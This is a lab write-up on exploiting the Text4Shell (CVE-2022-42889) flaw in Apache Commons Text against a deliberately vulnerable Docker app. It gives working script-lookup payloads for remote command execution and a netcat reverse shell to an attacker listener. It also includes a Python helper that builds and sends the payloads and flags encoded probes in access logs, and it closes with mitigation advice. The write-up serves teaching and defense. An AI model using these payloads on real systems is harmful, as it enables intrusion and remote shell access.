Exploiting ‘Text4Shell’ vulnerability (CVE-2022-42889)

Nol White Hat, published in InfoSec Write-ups, Oct 20, 2022

Summary
This article shows how an attacker could exploit the Text4Shell vulnerability (CVE-2022-42889) against a deliberately vulnerable Java web application. For this purpose we use U. J. Karthik's PoC application text4shell-poc.jar, run inside a Docker container.

Disclaimer
This article is for informational and educational purposes only, for those who are willing and curious to learn about security and penetration testing. The content may not be used for illegal purposes. If you're ready to learn something new for the good, then read on.

Details
The Text4Shell vulnerability was publicly disclosed by Apache on 13 October 2022. It affects Java applications that use the string interpolation feature of the Apache Commons Text library: the default StringSubstitutor returned by StringSubstitutor.createInterpolator() resolves ${prefix:name} expressions, and in versions 1.5 through 1.9 its default set of lookups included script (evaluates code through a JSR-223 script engine), dns and url. An application that interpolates attacker-controlled strings therefore lets a remote attacker execute arbitrary code on the server. For more information, see https://www.tarlogic.com/blog/cve-2022-42889-critical-vulnerability-affects-apache-commons-text/#CVE-2022-42889_Key_Features.

Vulnerable applications have the following characteristics:

- They use Apache Commons Text versions 1.5 through 1.9 (the dangerous lookups were introduced in 1.5 and are disabled by default from 1.10.0)
- They pass attacker-controlled strings through the library's interpolation (typically StringSubstitutor.createInterpolator().replace(input))

In this PoC, we will use a Dockerized test application “text4shell-poc.jar”. This test application was created by U J Karthik, an ethical hacker / developer from Delhi (https://github.com/karthikuj).

The PoC setup consists of one victim machine (Ubuntu Linux) and one attacker machine (Kali Linux 2022.3 release).

Victim (installation of text4shell-poc.jar)
— Ubuntu 20.04 (x64)
— IP-Address: 192.168.62.174

Attacker (for reverse shell)
— Kali Linux
— IP-Address: 192.168.62.161

The next sections include:
- Steps 1–3: Install requirements for vulnerable application
- Steps 4–8: Install the vulnerable application
- Steps 9–13: Perform Remote Code Execution on the vulnerable web application
- Steps 14–15: Set up a reverse shell to the attacker machine
- Mitigation
- Credits

Install requirements for vulnerable application

In order to get the vulnerable Java application up and running, we need to install OpenJDK, Maven and Docker.

1. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Install OpenJDK

sudo apt update && sudo apt install openjdk-11-jdk

2. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

We already have docker installed.

which docker

If you don’t have docker:

sudo apt install docker.io containerd runc

3. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Install Maven in /opt

cd /tmp
wget https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
tar -xvf apache-maven-3.6.3-bin.tar.gz
sudo mv apache-maven-3.6.3 /opt/

Set the environment parameters

M2_HOME='/opt/apache-maven-3.6.3'
PATH="$M2_HOME/bin:$PATH"
export PATH

Install the vulnerable application

4. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Download PoC application

cd /tmp
git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git

5. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Use maven to build the application.

cd /tmp/cve-2022-42889-text4shell-docker/
mvn clean install

6. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Build the docker container for the vulnerable application.

docker build --tag=text4shell .

7. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Start the docker image.

docker run -p 80:8080 text4shell

8. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Test the application on the victim machine.

firefox http://localhost/text4shell/attack?search=blablabla

Perform Remote Code Execution on the vulnerable web application

Now, use the attacker machine for further exploitation.

9. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Test the application on our attacker machine.

firefox http://192.168.62.174/text4shell/attack?search=blablabla

10. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Now attack the remote web server by passing a string “${prefix:name}”.

http://192.168.62.174/text4shell/attack?search=${script:javascript:java.lang.Runtime.getRuntime().exec'touch /tmp/foo’)}

Important: the above string contains: “exec.'touch”. This is not correct, it must be “.exec('touch”. Because of the Medium.com input validation, it was not possible to use “.exec'(touch”. Add the missing "(" manually.

Url encode the above string (https://www.urlencoder.org/).

http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%27touch%20%2Ftmp%2Ffoo%27%29%7D

Important: the above string contains: ".exec%27". This is not correct, it must be “.exec%28%27”. Because of the Medium.com input validation, it was not possible to use “.exec%28%27”. Add the missing “%28“ manually..

This is the correct output.

11. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Get the docker container id

docker container ls
Container ID: 4bc32732e273

12. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Start a bash shell inside the docker container. Use docker exec -it <container_id> bash

docker exec -it 4bc32732e273 bash

13. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).

Check if the RCE was successful. (You should see a file named foo created in the /tmp directory):

ls /tmp

The file /tmp/foo exists (touch creates an empty file, not a folder): RCE successful.

Setup a reverse shell with the attacker machine

The application container happens to ship a netcat binary that supports the -e option, so we can use it to set up a reverse shell to the attacker machine.

14. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Set up a netcat listener. Binding port 443 requires root, and Kali's default user is unprivileged, so run it with sudo (or choose a port above 1024 and adjust the payload in step 15).

sudo rlwrap nc -nlvp 443

15. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Construct the payload, this time making the container connect back to the Kali listener. Runtime.exec(String) splits the command on whitespace and runs it without a shell, so pipes, redirects or quoted arguments would not work here; a plain nc invocation does:

${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.62.161 443 -e /bin/bash')}

URL-encode the payload and request it:

http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nc%20192.168.62.161%20443%20-e%20%2Fbin%2Fbash%27%29%7D

This is the correct output.
Result after navigating to the URL.

Now check our Kali reverse listener.

Reverse shell from the container
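As an added example (not from the original post and not part of karthikuj's PoC application), the following Python script reproduces steps 10 and 15 programmatically and adds the defender's side: it builds the script-lookup payload, percent-encodes it exactly as the URLs above do, can send it, and flags such probes in web-server access logs, including double-encoded ones that a single-pass rule would miss. The target URL and the access-log lines are assumptions constructed for the example.

```python
"""Helper for the Text4Shell (CVE-2022-42889) steps above: builds the
${script:javascript:...} interpolation payload, percent-encodes it the way
steps 10 and 15 do, and flags such probes in web-server access logs.

Added example for this write-up; not part of karthikuj's PoC application.
The target URL and the access-log lines below are constructed assumptions.
"""
import re
import urllib.request
from urllib.parse import quote, unquote

# Lookup prefixes that Commons Text 1.5-1.9 wired into the default
# interpolator and that reach a script engine or the network.
DANGEROUS_LOOKUPS = ("script", "dns", "url")
LOOKUP_RE = re.compile(r"\$\{\s*(%s)\s*:" % "|".join(DANGEROUS_LOOKUPS), re.IGNORECASE)


def build_payload(command: str) -> str:
    """Wrap an OS command in the script lookup. When StringSubstitutor
    interpolates it, the JavaScript engine (Nashorn on JDK 11) evaluates
    java.lang.Runtime.exec(command) on the server."""
    if "'" in command:
        # A single quote would terminate the JS string literal early.
        raise ValueError("command must not contain a single quote")
    # Runtime.exec(String) splits on whitespace without a shell, so the
    # command must be a plain argv list (no pipes, redirects or quoting).
    return "${script:javascript:java.lang.Runtime.getRuntime().exec('%s')}" % command


def build_url(base: str, command: str, param: str = "search") -> str:
    """Attack URL with the payload percent-encoded as a query parameter.
    safe='' encodes '/' and ' ' as %2F and %20, matching the article."""
    return "%s?%s=%s" % (base, param, quote(build_payload(command), safe=""))


def send(url: str, timeout: float = 5.0) -> int:
    """Fire the request (the browser step in the article) and return the
    HTTP status. The command runs server-side; the body is irrelevant."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status


def decode_fully(s: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding: double-encoded probes are a common
    way around naive WAF rules. Stop once decoding changes nothing."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_probes(log_lines):
    """Return (line_no, prefix) for every access-log line whose decoded
    request contains a script/dns/url interpolation lookup."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOOKUP_RE.search(decode_fully(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed sample of what the victim's access log might contain:
# a benign request, the step-10 probe, and a double-encoded dns probe.
SAMPLE_LOG = [
    '192.168.62.161 - - [20/Oct/2022:10:01:02 +0000] "GET /text4shell/attack'
    '?search=blablabla HTTP/1.1" 200 51',
    '192.168.62.161 - - [20/Oct/2022:10:02:15 +0000] "GET /text4shell/attack'
    '?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29'
    '.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D HTTP/1.1" 200 51',
    '192.168.62.161 - - [20/Oct/2022:10:03:40 +0000] "GET /text4shell/attack'
    '?search=%2524%257Bdns%253Aaddress%253Aexample.com%257D HTTP/1.1" 200 51',
]

if __name__ == "__main__":
    target = "http://192.168.62.174/text4shell/attack"  # victim from the write-up
    print(build_url(target, "touch /tmp/foo"))
    print(build_url(target, "nc 192.168.62.161 443 -e /bin/bash"))
    for n, prefix in find_probes(SAMPLE_LOG):
        print("log line %d: %s lookup" % (n, prefix))
```

Running it prints the two attack URLs from steps 10 and 15 and reports that sample log lines 2 and 3 carry script and dns lookups; call send(build_url(...)) from the lab attacker machine to fire one. The detector decodes the request repeatedly because %2524 is what a probe looks like after one extra layer of encoding, which is easy to miss when grepping the raw log for "${script:".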

Mitigation

Apache fixed the issue in Commons Text 1.10.0: the script, dns and url lookups are no longer part of the default interpolator and must be enabled explicitly, so upgrading to 1.10.0 or later mitigates the vulnerability. Where an upgrade is not immediately possible, the fix is on the application side: never pass untrusted input through StringSubstitutor.createInterpolator(), and construct a StringSubstitutor whose lookups are limited to what the application actually needs. Note that running on a JDK without a bundled script engine (15 or later) only removes the script path; the dns and url lookups still allow DNS-based out-of-band interaction and server-side requests.

Credits

Special credits to U. J. Karthik for this PoC application (https://github.com/karthikuj)
Credits to those researchers that discovered this vulnerability and disclosed it first to Apache.
